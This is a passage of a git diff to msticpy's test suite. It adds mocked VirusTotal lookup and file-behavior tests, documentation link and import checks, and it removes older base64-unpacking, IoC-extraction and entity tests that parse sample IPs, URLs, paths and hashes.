+        self.assertGreater(test_df[["Positives"]].values, 0)
+
+        print(test_df.T)
+
+        vtlookup = VTLookup(vtkey="fake", verbosity=2)
+        FILE_NAME2 = path.join(TEST_DATA_PATH, "domain_neg.json")
+        with open(FILE_NAME2, "r") as file_handle:
+            txt = file_handle.read()
+
+        vt_params = vtlookup._VT_API_TYPES["domain"]
+        vtlookup._parse_vt_results(
+            vt_results=txt,
+            observable="7657fcb7d772448a6d8504e4b20168b8",
+            ioc_type="dns",
+            vt_param=vt_params,
+        )
+        test_df = vtlookup.results[self._TEST_COLS]
+        self.assertEqual(len(test_df), 1)
+        self.assertGreater(len(test_df[["ResolvedIPs"]].values), 0)
+        self.assertGreater(len(test_df[["DetectedUrls"]].values), 0)
+        print(test_df.T)
+
+    def test_parse_ip_results(self):
+        vtlookup = VTLookup(vtkey="fake", verbosity=2)
+
+        FILE_NAME = path.join(TEST_DATA_PATH, "ip-address_pos.json")
+        with open(FILE_NAME, "r") as file_handle:
+            txt = file_handle.read()
+
+        vt_params = vtlookup._VT_API_TYPES["ip-address"]
+        vtlookup._parse_vt_results(
+            vt_results=txt,
+            observable="7657fcb7d772448a6d8504e4b20168b8",
+            ioc_type="ipv4",
+            vt_param=vt_params,
+        )
+        test_df = vtlookup.results[self._TEST_COLS]
+        self.assertEqual(len(test_df), 1)
+        self.assertGreater(len(test_df[["ResolvedDomains"]].values), 0)
+        self.assertGreater(len(test_df[["DetectedUrls"]].values), 0)
+        self.assertGreater(test_df[["Positives"]].values, 0)
+        print(test_df.T)
+
+        vtlookup = VTLookup(vtkey="fake", verbosity=2)
+        FILE_NAME2 = path.join(TEST_DATA_PATH, "ip-address_neg.json")
+        with open(FILE_NAME2, "r") as file_handle:
+            txt = file_handle.read()
+
+        vt_params = vtlookup._VT_API_TYPES["ip-address"]
+        vtlookup._parse_vt_results(
+            vt_results=txt,
+            observable="7657fcb7d772448a6d8504e4b20168b8",
+            ioc_type="ipv4",
+            vt_param=vt_params,
+        )
+        test_df = vtlookup.results[self._TEST_COLS]
+        self.assertEqual(len(test_df), 1)
+        self.assertGreater(len(test_df[["ResolvedDomains"]].values), 0)
+        self.assertEqual(test_df[["Positives"]].values, 0)
+        print(test_df.T)
+
+
+if __name__ == "__main__":
+    unittest.main()
+    print("bye")
diff --git a/tests/sectools/test_vtlookupv3.py b/tests/sectools/test_vtlookupv3.py
new file mode 100644
index 000000000..2787f4203
--- /dev/null
+++ b/tests/sectools/test_vtlookupv3.py
@@ -0,0 +1,394 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""vtlookupv3 unit tests."""
+import json
+import os
+import sys
+from typing import Any, Dict, Iterator, Optional
+from unittest.mock import patch
+
+import ipywidgets as widgets
+import pandas as pd
+import pytest
+import pytest_check as check
+from bokeh.layouts import LayoutDOM
+from vt.object import Object as VtObject
+
+from msticpy.sectools import vtlookupv3
+
+from ..unit_test_lib import get_test_data_path
+
+# pylint: disable=redefined-outer-name, protected-access, unspecified-encoding
+# pylint: disable=no-value-for-parameter
+
+VTLookupV3 = vtlookupv3.VTLookupV3
+VT_API_NOT_FOUND = vtlookupv3.VT_API_NOT_FOUND
+MsticpyVTNoDataError = vtlookupv3.MsticpyVTNoDataError
+VTFileBehavior = vtlookupv3.VTFileBehavior
+VTBrowser = vtlookupv3.VTObjectBrowser
+
+
+__author__ = "Ian Hellen"
+
+
+@patch("msticpy.sectools.vtlookupv3.vtlookupv3.vt")
+def create_vt_client(vt_lib) -> VTLookupV3:
+    """Test simple lookup of IoC."""
+    vt_lib.Client = VTClient
+    vt_lib.APIError = VTAPIError
+
+    return VTLookupV3()
+
+
+@pytest.fixture
+def vt_client(monkeypatch):
+    """Return a VTLookup instance."""
+    vt_lib_fb = sys.modules["msticpy.sectools.vtlookupv3.vtfile_behavior"]
+    vt = getattr(vt_lib_fb, "vt")
+    monkeypatch.setattr(vt, "Client", VTClient)
+    monkeypatch.setattr(vt, "APIError", VTAPIError)
+    return create_vt_client()
+
+
+_D_ROOT = get_test_data_path()
+_TEST_URLS = ["one", "two", "three"]
+
+
+class VTAPIError(Exception):
+    """Mock VT API Error."""
+
+    def __init__(self, code, message, *args):
+        """Initialize."""
+        ex_args = [message, code, *args]
+        super().__init__(*ex_args)
+
+
+class VTRelationCounters:
+    """Mock result for VT relation counters."""
+
+    def __init__(self, count=0):
+        """Initialize."""
+        self.count = count
+
+    @property
+    def relationships(self):
+        """Return relationships dict."""
+        return {"contacted_urls": {"meta": {"count": self.count}}}
+
+
+class VTClient:
+    """Mock V3 VT client."""
+
+    _OBJ_FILES = ["vt3_url_0.json", "vt3_url_1.json", "vt3_url_2.json"]
+    _REL_LINK_FILE = "vt3_related_links.json"
+    _FB_SUM_FILE = "vt3_behavior_summary.json"
+    _FB_MS_FILE = "vt3_behavior_ms_sysinternals.json"
+    _FILE_SUMMARY = "vt3_file_1.json"
+
+    _URL_OBJS = [
+        json.loads(_D_ROOT.joinpath(url_file).read_text()) for url_file in _OBJ_FILES
+    ]
+    _URL_LINKS = json.loads(_D_ROOT.joinpath(_REL_LINK_FILE).read_text())
+    _VT_FB_SUMMARY = json.loads(_D_ROOT.joinpath(_FB_SUM_FILE).read_text())
+    _VT_FB_MSSYS = json.loads(_D_ROOT.joinpath(_FB_MS_FILE).read_text())
+    _VT_FILE_SUMMARY = json.loads(_D_ROOT.joinpath(_FILE_SUMMARY).read_text())
+
+    def __init__(self, apikey: Optional[str] = None):
+        """Initialize the class."""
+        self._vt_key = apikey
+
+    def get_object(self, path: str, *path_args, params=None) -> Any:
+        """Fetch the object from VT."""
+        del path_args, params
+        if "relationship_counters" in path:
+            if "file" in path:
+                return VTRelationCounters(count=3)
+            return VTRelationCounters(count=0)
+        if "one" in path:
+            return VtObject.from_dict(self._URL_OBJS[0])
+        if "two" in path:
+            return VtObject.from_dict(self._URL_OBJS[1])
+        if "three" in path:
+            return VtObject.from_dict(self._URL_OBJS[2])
+        if "file" in path:
+            return VtObject.from_dict(self._VT_FILE_SUMMARY)
+        if "not-found" in path:
+            raise VTAPIError(message=VT_API_NOT_FOUND, code=404)
+        raise VTAPIError(message="Some error", code=404)
+
+    def get_data(self, path: str, *path_args, params=None) -> Dict[str, Any]:
+        """Fetch the file behavior data from VT."""
+        del path_args, params
+        if "behaviour_summary" in path:
+            return self._VT_FB_SUMMARY
+        if "file_behaviours" in path:
+            return self._VT_FB_MSSYS
+        raise VTAPIError(message=VT_API_NOT_FOUND, code=404)
+
+    def iterator(
+        self, path: str, *path_args, params=None, cursor=None, limit=0, batch_size=0
+    ) -> Iterator:
+        """Return an iterator of VT objects."""
+        del path_args, params, cursor, limit, batch_size
+        if "relationships" in path:
+            return iter(VtObject.from_dict(url_data) for url_data in self._URL_LINKS)
+        return iter(VtObject.from_dict(url_data) for url_data in self._URL_OBJS)
+
+    def close(self):
+        """Close the client connection."""
+        return None
+
+
+def test_init_vt_lookup_class():
+    """Test fetching a key from settings."""
+    test_vt_key = "somerandomvalue"
+
+    vt_client = VTLookupV3(vt_key=test_vt_key)
+    check.equal(vt_client._vt_key, test_vt_key)
+
+    try:
+        curr_vt_key = os.environ.get("VIRUSTOTAL_AUTH", "")
+        os.environ["VIRUSTOTAL_AUTH"] = test_vt_key
+        vt_client = VTLookupV3(vt_key=test_vt_key)
+        check.equal(vt_client._vt_key, test_vt_key)
+    finally:
+        os.environ["VIRUSTOTAL_AUTH"] = curr_vt_key
+
+
+@patch(VTLookupV3.__module__ + ".vt")
+def test_lookup_ioc(vt_lib):
+    """Test simple lookup of IoC."""
+    vt_lib.Client = VTClient
+    vt_lib.APIError = VTAPIError
+    vt_client = VTLookupV3()
+    url = _TEST_URLS[0]
+
+    # Simple lookup
+    result_df = vt_client.lookup_ioc(url, vt_type="url")
+    check.equal(result_df.shape, (1, 7))
+    check.equal(
+        result_df.iloc[0].id,
+        "380269259e1f607fb07769fee779f0dc3144924f865e76a3c05c8898295d02f8",
+    )
+    check.equal(result_df.iloc[0].type, "url")
+
+    # all properties
+    result_df = vt_client.lookup_ioc(url, vt_type="url", all_props=True)
+    check.equal(result_df.shape, (1, 287))
+
+    # Invalid type
+    with pytest.raises(ValueError) as vt_error:
+        result_df = vt_client.lookup_ioc(url, vt_type="invalid_type")
+    check.equal(vt_error.value.args[0], "'invalid_type' is not a valid VTEntityType")
+
+    # Nonexistent URL
+    result_df = vt_client.lookup_ioc("not-found", vt_type="url")
+    check.equal(result_df.shape, (1, 5))
+    check.equal(result_df.iloc[0].type, "url")
+    check.equal(result_df.iloc[0].id, "not-found")
+    check.equal(result_df.iloc[0].last_submission_date, "Not found")
+
+    # Other failure
+    with pytest.raises(MsticpyVTNoDataError):
+        result_df = vt_client.lookup_ioc("fail", vt_type="url")
+
+
+@patch(VTLookupV3.__module__ + ".vt")
+def test_lookup_iocs(vt_lib):
+    """Test lookup of multiple IoCs."""
+    vt_lib.Client = VTClient
+    vt_lib.APIError = VTAPIError
+    vt_client = VTLookupV3()
+
+    # Simple lookup
+    obs_df = pd.DataFrame(
+        {
+            "observable": _TEST_URLS,
+            "type": ["url"] * 3,
+        }
+    )
+
+    # Simple lookup of multiple items
+    result_df = vt_client.lookup_iocs(
+        obs_df, observable_column="observable", observable_type_column="type"
+    )
+    check.equal(result_df.shape, (3, 7))
+    check.equal(
+        result_df.iloc[0].id,
+        "380269259e1f607fb07769fee779f0dc3144924f865e76a3c05c8898295d02f8",
+    )
+    check.equal(result_df.iloc[0].type, "url")
+
+    # All properties
+    result_df = vt_client.lookup_iocs(
+        obs_df,
+        observable_column="observable",
+        observable_type_column="type",
+        all_props=True,
+    )
+    check.equal(result_df.shape, (3, 399))
+    check.equal(
+        result_df.iloc[0].id,
+        "380269259e1f607fb07769fee779f0dc3144924f865e76a3c05c8898295d02f8",
+    )
+    check.equal(
+        result_df.iloc[1].id,
+        "19e1199c6aa6e817845cc025cd7c8979cec22f8c94bc7416ff16b8808706cd54",
+    )
+    check.equal(result_df.iloc[0].type, "url")
+
+    # With unknown item
+    obs_df = pd.DataFrame(
+        {"observable": _TEST_URLS + ["not-found"], "type": ["url"] * 4}
+    )
+    result_df = vt_client.lookup_iocs(
+        obs_df, observable_column="observable", observable_type_column="type"
+    )
+    check.equal(result_df.shape, (4, 7))
+    check.equal(result_df.iloc[3].type, "url")
+    check.equal(result_df.iloc[3].id, "not-found")
+    check.equal(result_df.iloc[3].last_submission_date, "Not found")
+
+
+def test_lookup_ioc_relationship(vt_client: VTLookupV3):
+    """Test lookup relationship links."""
+    file = "380269259e1f607fb07769fee779f0dc3144924f865e76a3c05c8898295d02f8"
+
+    # Simple lookup
+    result_df = vt_client.lookup_ioc_relationships(
+        file, vt_type="file", relationship="contacted_urls"
+    )
+    check.equal(len(result_df), 3)
+    result_df_noidx = result_df.reset_index()
+    check.equal(
+        result_df_noidx.iloc[0].target,
+        "380269259e1f607fb07769fee779f0dc3144924f865e76a3c05c8898295d02f8",
+    )
+    check.equal(result_df.iloc[0].relationship_type, "contacted_urls")
+
+    # failed lookup
+    result_df = vt_client.lookup_ioc_relationships(
+        file, vt_type="ip_address", relationship="contacted_urls"
+    )
+    check.equal(result_df.shape, (1, 6))
+    check.equal(result_df.iat[0, 2], "Not found")
+
+
+def test_lookup_ioc_related(vt_client: VTLookupV3):
+    """Test lookup related objects."""
+    file = "380269259e1f607fb07769fee779f0dc3144924f865e76a3c05c8898295d02f8"
+
+    # Lookup related
+    result_df = vt_client.lookup_ioc_related(
+        file, vt_type="file", relationship="contacted_urls"
+    )
+    check.equal(result_df.shape, (3, 403))
+    result_df_noidx = result_df.reset_index()
+    check.equal(
+        result_df_noidx.iloc[0].target,
+        "380269259e1f607fb07769fee779f0dc3144924f865e76a3c05c8898295d02f8",
+    )
+    check.equal(result_df.iloc[0].relationship_type, "contacted_urls")
+
+
+def test_lookup_iocs_relationships(vt_client: VTLookupV3):
+    """Test lookup of IoC relationships for multiple IoCs."""
+    # Lookup related items for multi IoCs
+    files = [
+        f"380269259e1f607fb07769fee779f0dc3144924f865e76a3c05c8898295d02f{idx}"
+        for idx in range(3)
+    ]
+    obs_df = pd.DataFrame(
+        {
+            "observable": files,
+            "type": ["file"] * 3,
+        }
+    )
+    result_df = vt_client.lookup_iocs_relationships(
+        observables_df=obs_df,
+        observable_column="observable",
+        observable_type_column="type",
+        relationship="contacted_urls",
+    )
+    check.equal(len(result_df), 9)
+    result_df_noidx = result_df.reset_index()
+    for idx in range(0, 9, 3):
+        check.equal(
+            result_df_noidx.iloc[idx].target,
+            "380269259e1f607fb07769fee779f0dc3144924f865e76a3c05c8898295d02f8",
+        )
+        check.equal(result_df.iloc[idx].relationship_type, "contacted_urls")
+
+
+def test_get_object(vt_client: VTLookupV3):
+    """Test simple get_object api."""
+    result_df = vt_client.get_object(_TEST_URLS[0], vt_type="url")
+    check.equal(result_df.shape, (1, 286))
+    check.equal(
+        result_df.iloc[0].id,
+        "380269259e1f607fb07769fee779f0dc3144924f865e76a3c05c8898295d02f8",
+    )
+    check.equal(result_df.iloc[0].type, "url")
+
+
+_EXP_KEYS = {
+    "processes_injected",
+    "processes_terminated",
+    "files_opened",
+    "processes_created",
+    "registry_keys_set",
+    "processes_tree",
+}
+_FB_TESTS = [
+    ("Summary", None, _EXP_KEYS),
+    ("microsoft_sysinternals", "microsoft_sysinternals", _EXP_KEYS),
+]
+
+_FB_TEST_IDS = [test[0] for test in _FB_TESTS]
+
+
+@pytest.mark.parametrize("name, sandbox, keys", _FB_TESTS, ids=_FB_TEST_IDS)
+def test_file_behavior(vt_client: VTLookupV3, name, sandbox, keys):
+    """Test get_file_behavior api."""
+    del name
+    file = "380269259e1f607fb07769fee779f0dc3144924f865e76a3c05c8898295d02f8"
+    vt_file_behavior = vt_client.get_file_behavior(file_id=file, sandbox=sandbox)
+    check.is_instance(vt_file_behavior, VTFileBehavior)
+    check.is_true(vt_file_behavior.has_behavior_data)
+    check.is_false(keys - vt_file_behavior.categories.keys())
+
+    browser = vt_file_behavior.browse()
+    check.is_instance(browser, widgets.VBox)
+
+    proc_tree = vt_file_behavior.process_tree
+    check.is_instance(proc_tree, LayoutDOM)
+
+    check.is_instance(vt_file_behavior.process_tree_df, pd.DataFrame)
+
+
+def test_get_object_browser(vt_client: VTLookupV3):
+    """Test object browser."""
+    del vt_client
+    vt_browser = VTBrowser()
+    # emulate looking up a file using UI
+    vt_browser.txt_file_id.value = "file"
+    vt_browser.btn_lookup.click()
+
+    check.equal(vt_browser._current_data.shape, (1, 584))
+    check.equal(
+        vt_browser._current_data.iloc[0].id,
+        "03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b",
+    )
+    check.equal(vt_browser._current_data.iloc[0].type, "file")
+    check.equal(set(vt_browser._current_data.columns), set(vt_browser.data_sel.options))
+
+    # Check that it auto-loads from init
+    vt_browser = VTBrowser("file")
+    check.equal(vt_browser._current_data.shape, (1, 584))
+    check.equal(
+        vt_browser._current_data.iloc[0].id,
+        "03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b",
+    )
diff --git a/tests/test_b64unpack.py b/tests/test_b64unpack.py
deleted file mode 100644
index 7c814f2c0..000000000
--- a/tests/test_b64unpack.py
+++ /dev/null
@@ -1,82 +0,0 @@
-# -------------------------------------------------------------------------
-# Copyright (c) Microsoft Corporation. All rights reserved.
-# Licensed under the MIT License. See License.txt in the project root for
-# license information.
-# --------------------------------------------------------------------------
-"""Base64unpack test class."""
-import unittest
-import os
-from os import path
-import pandas as pd
-
-from .. msticpy.sectools import base64unpack as b64
-
-
-_test_data_folders = [d for d, _, _ in os.walk(os.getcwd()) if d.endswith('/tests/testdata')]
-if len(_test_data_folders) == 1:
-    _TEST_DATA = _test_data_folders[0]
-else:
-    _TEST_DATA = './tests/testdata'
-
-
-class TestB64Unpack(unittest.TestCase):
-    """Unit test class."""
-    def test_archive_string(self):
-        try:
-            input_txt = None
-            FILE_NAME = path.join(_TEST_DATA, 'b64text_inzip.txt')
-            with open(FILE_NAME, 'r') as f_handle:
-                input_txt = f_handle.read()
-
-            self.assertIsNotNone(input_txt)
-
-            result_str, result_df = b64.unpack_items(input_string=input_txt, trace=True)
-            print(result_str)
-            # assert result_df.shape == (2, 12)
-            self.assertIsNotNone(result_str)
-            self.assertIsNotNone(result_df)
-
-        except FileNotFoundError as ex:
-            self.fail(msg='Exception {}'.format(str(ex)))
-
-    def test_nested_archive(self):
-        try:
-            input_txt = None
-            FILE_NAME = path.join(_TEST_DATA, 'base64msg.txt')
-            with open(FILE_NAME, 'r') as f_handle:
-                input_txt = f_handle.read()
-
-            self.assertIsNotNone(input_txt)
-
-            result_str, result_df = b64.unpack_items(input_string=input_txt, trace=True)
-            assert result_df.shape == (8, 12)
-            self.assertIsNotNone(result_str)
-            self.assertIsNotNone(result_df)
-
-        except FileNotFoundError as ex:
-            self.fail(msg='Exception {}'.format(str(ex)))
-
-    def test_nested_archive_df(self):
-        try:
-            input_txt = None
-            FILE_NAME = path.join(_TEST_DATA, 'base64msg.txt')
-            with open(FILE_NAME, 'r') as f_handle:
-                input_txt = f_handle.read()
-
-            self.assertIsNotNone(input_txt)
-            # create datframe for input with 2 rows and add same data to both
-            input_df = pd.DataFrame(data=['a', 'b'], columns=['input'], index=[0, 1])
-            input_df['input'] = input_txt
-            result_df = b64.unpack_items(data=input_df, column='input', trace=True)
-            # we should get 2x the rows as the previous test (since data is duplicated)
-            # plus 2 added columns
-            assert result_df.shape == (16, 14)
-            self.assertIsNotNone(result_df)
-
-        except FileNotFoundError as ex:
-            self.fail(msg='Exception {}'.format(str(ex)))
-
-
-if __name__ == '__main__':
-    unittest.main()
-    print('bye')
diff --git a/tests/test_doc_links.py b/tests/test_doc_links.py
new file mode 100644
index 000000000..6d4033179
--- /dev/null
+++ b/tests/test_doc_links.py
@@ -0,0 +1,58 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""test documentation links."""
+import sys
+import os
+from pathlib import Path
+
+import pytest
+
+from tools.toollib.url_checker import check_md_document, check_html_docs
+from tools.toollib.url_checker_async import check_docs
+
+DOC_ROOT = "docs."
+HTML_PATH = "build/html"
+
+
+@pytest.mark.skipif(
+    not os.environ.get("MSTICPY_TEST_NOSKIP"), reason="Skipped for local tests."
+)
+def test_readme_md():
+    readme_file = "README.md"
+    if Path(".").absolute().joinpath(readme_file).is_file:
+        readme_file = Path(".").absolute().joinpath(readme_file)
+    else:
+        for check_path in Path(__file__).absolute().parents:
+            if check_path.joinpath(readme_file).is_file():
+                readme_file = check_path.joinpath(readme_file)
+                break
+        else:
+            assert Path(".").absolute().joinpath(readme_file).is_file
+
+    results = check_md_document(str(readme_file))
+    page_not_found = [p for p in results.values() if p.status == 404]
+    if page_not_found:
+        print("Please fix the following 404 Errors:")
+        for page in page_not_found:
+            print(page)
+    assert not page_not_found
+
+
+@pytest.mark.skipif(
+    not os.environ.get("MSTICPY_TEST_NOSKIP"), reason="Skipped for local tests."
+)
+def test_doc_pages_doc_links():
+    results = check_docs("./docs", recurse=False)
+    page_errors = []
+    for page, result_dict in results.items():
+        for result in result_dict.values():
+            if result.status == 404:
+                page_errors.append(f"{result.status} - {result.url}")
+    if page_errors:
+        print("Please fix the following 404 Errors:")
+        for page in page_errors:
+            print(page)
+    assert not page_errors
diff --git a/tests/test_ioc_extractor.py b/tests/test_ioc_extractor.py
deleted file mode 100644
index 0d2b9e0ba..000000000
--- a/tests/test_ioc_extractor.py
+++ /dev/null
@@ -1,110 +0,0 @@
-
-import unittest
-
-import pandas as pd
-
-# Test code
-from .. msticpy.sectools.iocextract import IoCExtract
-
-TEST_CASES = {
-    'ipv4_test': r'c:\one\path\or\another\myprocess -ip4:206.123.1.123',
-    'ipv6_test': r'''c:\one\path\or\another\myprocess -ip6:(2001:0db8:85a3:0000:0000:8a2e:0370:7334,
-    2001:db8:85a3:0:0:8a2e:370:7334,2001:db8:85a3::8a2e:370:7334,::ffff:192.0.2.128)''',
-    'url_test': r'''c:\one\path\or\another\myprocess /url:https://some.domain.it/thepath?qry1=abc&qry2=xyz
-        /url:https://myuser@some.domain.es:88/thepath?qry1=abc&qry2=xyz''',
-    'windows_path_test': r'c:\one\path\or\another\myprocess -file:"..\another\file" -file:"\\uncpath\file"',
-    'linux_path_test': r'/bin/bash --file:./bish --file:/bin/bash --file:../../bosh',
-    'md5_hash_test': '00236a2ae558018ed13b5222ef1bd987hash -something-hash=00236a2ae558018ed13b5222ef1bd987hash -something -hash=00236a2ae558018ed13b5222ef1bd987',
-    'sha1_hash_test': '00236a2ae558018ed13b5222ef1bd98700000001hash -something -hash=00236a2ae558018ed13b5222ef1bd98700000001hash -something -hash=00236a2ae558018ed13b5222ef1bd98700000001',
-    'sha256_hash_test': '''00236a2ae558018ed13b5222ef1bd98700000001123456789012345678901234hash -something -hash=00236a2ae558018ed13b5222ef1bd98700000001123456789012345678901234hash -something
--hash=00236a2ae558018ed13b5222ef1bd98700000001123456789012345678901234''',
-    'url2_test': 'curl \'https://www.virustotal.com/en/ip-address/90.156.201.27/information/\''}
-
-
-class TestIoCExtractor(unittest.TestCase):
-    """Unit test class."""
-    def __run_extract(self, extractor=None, testcase=None, expected_items=None,
-                      os_family='Windows'):
-        if extractor is None or testcase is None or expected_items is None:
-            raise Exception('One or more required parameters were missing')
-
-        test_input = TEST_CASES[testcase + '_test']
-        results = extractor.extract(test_input, os_family=os_family)
-        for k, v in expected_items.items():
-            self.assertEqual(len(results[k]), v, 'Unexpected value for ' + k)
-
-    def setUp(self):
-        self.extractor = IoCExtract()
-
-    def test_ipv4(self):
-        self.__run_extract(self.extractor, 'ipv4', {'ipv4': 1})
-
-    def test_ipv6(self):
-        self.__run_extract(self.extractor, 'ipv6', {'ipv6': 2})
-
-    def test_url(self):
-        self.__run_extract(self.extractor, 'url', {'url': 2, 'dns': 2, 'ipv4': 0})
-        self.__run_extract(self.extractor, 'url2', {'url': 1, 'dns': 1, 'ipv4': 1})
-
-    def test_windows_path(self):
-        self.__run_extract(self.extractor, 'windows_path', {'windows_path': 3})
-
-    def test_linux_path(self):
-        self.__run_extract(self.extractor, 'linux_path', {'linux_path': 3},
-                           os_family='Linux')
-
-    def test_hashes(self):
-        self.__run_extract(self.extractor, 'md5_hash', {'md5_hash': 3})
-        self.__run_extract(self.extractor, 'sha1_hash', {'sha1_hash': 3})
-        self.__run_extract(self.extractor, 'sha256_hash', {'sha256_hash': 3})
-
-    def test_dataframe(self):
-
-        input_df = pd.DataFrame.from_dict(data=TEST_CASES, orient='index', columns=['input'])
-        output_df = self.extractor.extract(data=input_df, columns=['input'], os_family='Windows')
-
-        self.assertGreater(output_df.shape[0], 0)
-        self.assertEqual(output_df[output_df['IoCType'] == 'ipv4'].shape[0], 3)
-        self.assertEqual(output_df[output_df['IoCType'] == 'ipv6'].shape[0], 2)
-        self.assertEqual(output_df[output_df['IoCType'] == 'url'].shape[0], 3)
-        self.assertEqual(output_df[output_df['IoCType'] == 'windows_path'].shape[0], 6)
-        self.assertEqual(output_df[output_df['IoCType'] == 'linux_path'].shape[0], 0)
-        self.assertEqual(output_df[output_df['IoCType'] == 'md5_hash'].shape[0], 3)
-        self.assertEqual(output_df[output_df['IoCType'] == 'sha1_hash'].shape[0], 3)
-        self.assertEqual(output_df[output_df['IoCType'] == 'sha256_hash'].shape[0], 3)
-
-        input_df = pd.DataFrame.from_dict(data=TEST_CASES, orient='index', columns=['input'])
-        output_df = self.extractor.extract(data=input_df, columns=['input'], os_family='Linux')
-        # for _, row in output_df[output_df['IoCType'] == 'url'].iterrows():
-        #     print(row.Observable)
-        self.assertGreater(output_df.shape[0], 0)
-        self.assertEqual(output_df[output_df['IoCType'] == 'ipv4'].shape[0], 3)
-        self.assertEqual(output_df[output_df['IoCType'] == 'ipv6'].shape[0], 2)
-        self.assertEqual(output_df[output_df['IoCType'] == 'url'].shape[0], 3)
-        self.assertEqual(output_df[output_df['IoCType'] == 'windows_path'].shape[0], 0)
-        self.assertEqual(output_df[output_df['IoCType'] == 'linux_path'].shape[0], 8)
-        self.assertEqual(output_df[output_df['IoCType'] == 'md5_hash'].shape[0], 3)
-        self.assertEqual(output_df[output_df['IoCType'] == 'sha1_hash'].shape[0], 3)
-        self.assertEqual(output_df[output_df['IoCType'] == 'sha256_hash'].shape[0], 3)
-
-    def test_dataframe_ioc_types(self):
-
-        input_df = pd.DataFrame.from_dict(data=TEST_CASES, orient='index', columns=['input'])
-        output_df = self.extractor.extract(data=input_df, columns=['input'], os_family='Windows',
-            ioc_types=['ipv4', 'url', 'md5_hash'])
-
-        self.assertGreater(output_df.shape[0], 0)
-        self.assertEqual(output_df[output_df['IoCType'] == 'ipv4'].shape[0], 3)
-        self.assertEqual(output_df[output_df['IoCType'] == 'ipv6'].shape[0], 0)
-        self.assertEqual(output_df[output_df['IoCType'] == 'url'].shape[0], 3)
-        self.assertEqual(output_df[output_df['IoCType'] == 'windows_path'].shape[0], 0)
-        self.assertEqual(output_df[output_df['IoCType'] == 'linux_path'].shape[0], 0)
-        self.assertEqual(output_df[output_df['IoCType'] == 'md5_hash'].shape[0], 3)
-        self.assertEqual(output_df[output_df['IoCType'] == 'sha1_hash'].shape[0], 0)
-        self.assertEqual(output_df[output_df['IoCType'] == 'sha256_hash'].shape[0], 0)
-
-if __name__ == '__main__':
-    unittest.main()
-
-
-
diff --git a/tests/test_kql_magic.py b/tests/test_kql_magic.py
deleted file mode 100644
index 972e208d3..000000000
--- a/tests/test_kql_magic.py
+++ /dev/null
@@ -1,32 +0,0 @@
-# -------------------------------------------------------------------------
-# Copyright (c) Microsoft Corporation. All rights reserved.
-# Licensed under the MIT License. See License.txt in the project root for
-# license information.
-# --------------------------------------------------------------------------
-"""security_alert test class."""
-import unittest
-# import pandas as pd
-
-# from IPython import get_ipython, embed_kernel
-
-# from .. nbtools import kql
-# from .. nbtools.security_alert_graph import create_alert_graph
-# from .. nbtools.nbdisplay import display_alert
-
-
-class TestKqlMagic(unittest.TestCase):
-    """Unit test class."""
-
-    _WS = '802d39e1-9d70-404d-832c-2de5e2478eda'
-    query = '''
-SecurityAlert
-| take 1
-    '''
-
-    def setUp(self):
-        """Run query using KqlMagic."""
-        pass
-
-    def test_kql_magic(self):
-        """Run query using KqlMagic."""
-        self.assertTrue(True)
\ No newline at end of file
diff --git a/tests/test_nb_tools.py b/tests/test_nb_tools.py
deleted file mode 100644
index 8b27a66be..000000000
--- a/tests/test_nb_tools.py
+++ /dev/null
@@ -1,62 +0,0 @@
-# -------------------------------------------------------------------------
-# Copyright (c) Microsoft Corporation. All rights reserved.
-# Licensed under the MIT License. See License.txt in the project root for
-# license information.
-# --------------------------------------------------------------------------
-"""query_schema test class."""
-import unittest
-import json
-
-# from .. nbtools import query_builtin_queries as queries
-# from .. nbtools.query_mgr import replace_query_params, add_query
-# from .. nbtools.query_defns import DataFamily, DataEnvironment, KqlQuery
-from .. msticpy.nbtools.entityschema import Entity, Account, Host, Process, File, IpAddress
-
-
-class Testnbtools(unittest.TestCase):
-    """Unit test class."""
-
-    def entity_creation(self):
-        try:
-            file = './msticpy/tests/testdata/entities.json'
-            with open(file, 'r') as file_handle:
-                txt = file_handle.read()
-                entity_dict = json.loads(txt)
-
-            parsed_entities = []
-            for _, entity in entity_dict.items():
-                e = Entity.instantiate_entity(entity)
-                self.assertIsInstance(e, Entity)
-
-                if e['Type'] == 'account':
-                    self.assertIsInstance(e, Account)
-                    self.assertTrue('Name' in e)
-                    self.assertGreater(len(e.Name), 0)
-                elif e['Type'] == 'host':
-                    self.assertIsInstance(e, Host)
-                    self.assertTrue('HostName' in e)
-                    self.assertGreater(len(e.HostName), 0)
-                elif e['Type'] == 'process':
-                    self.assertIsInstance(e, Process)
-                    self.assertTrue('ProcessId' in e)
-                    self.assertGreater(len(e.ProcessId), 0)
-                elif e['Type'] == 'file':
-                    self.assertIsInstance(e, File)
-                    self.assertTrue('Name' in e)
-                    self.assertGreater(len(e.Name), 0)
-                elif e['Type'] == 'ipaddress':
-                    self.assertIsInstance(e, IpAddress)
-                    self.assertTrue('Address' in e)
-                    self.assertGreater(len(e.Address), 0)
-
-                parsed_entities.append(e)
-
-            self.assertGreaterEqual(len(parsed_entities), 7)
-
-        except Exception as ex:
-            self.fail(msg='Exception {}'.format(str(ex)))
-
-
-if __name__ == '__main__':
-    unittest.main()
-    print('bye')
diff --git a/tests/test_pkg_imports.py b/tests/test_pkg_imports.py
new file mode 100644
index 000000000..81cd83239
--- /dev/null
+++ b/tests/test_pkg_imports.py
@@ -0,0 +1,146 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""test package imports."""
+import importlib
+import re
+import sys
+from pathlib import Path
+
+import pytest
+import pytest_check as check
+
+from tools.toollib.import_analyzer import analyze_imports, get_extras_from_setup
+
+PKG_ROOT = "."
+PKG_NAME = "msticpy"
+REQS_FILE = "requirements.txt"
+REQS_OP_RGX = r"[=<>~!\s]+"
+
+EXTRAS_EXCEPTIONS = {
+    "vt",
+    "vt_graph_api",
+    "bs4",
+    "seaborn",
+    "msticpy",
+    "msticnb",
+    "pyperclip",
+}
+CONDA_PKG_EXCEPTIONS = {
+    "vt-py",
+    "vt-graph-api",
+    "nest_asyncio",
+    "KqlmagicCustom[jupyter-extended]",
+    "sumologic-sdk",
+    "openpyxl",
+}
+
+
